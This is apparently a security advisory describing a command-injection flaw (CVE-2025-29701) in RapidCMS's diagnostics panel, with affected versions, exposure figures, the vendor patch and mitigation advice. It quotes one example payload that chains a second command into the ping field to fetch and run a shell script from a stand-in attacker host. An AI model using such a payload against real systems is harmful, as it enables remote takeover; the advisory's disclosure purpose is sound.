A new high-severity vulnerability, CVE-2025-29701, has surfaced in the popular content management framework RapidCMS, affecting versions 2.3.0 to 2.4.5. This flaw allows unauthenticated command injection via the diagnostic utility under /admin/tools/diagnostics. When a user submits crafted input into the “Network Diagnostic” panel—particularly the ping or traceroute fields—the backend improperly parses shell commands without sanitizing input, leading to remote code execution. Exploiting this is trivial; a payload like 8.8.8.8 && curl attacker.com/shell.sh | bash would grant full shell access if executed. What’s more dangerous is that this endpoint is exposed on many default installations, making mass exploitation feasible. Shodan shows over 1,400 exposed instances, many on education and municipal networks. The vendor has patched this in version 2.4.6, introducing proper shell escaping using shlex.quote() in Python and whitelisting acceptable arguments.

If your instance is public-facing, patch immediately or mitigate by blocking access to /admin/tools from external IPs. Bug bounty hunters should keep an eye out—especially on instances using the default admin path. This CVE is a prime example of how a single unsanitized field can flip a server into an attack vector.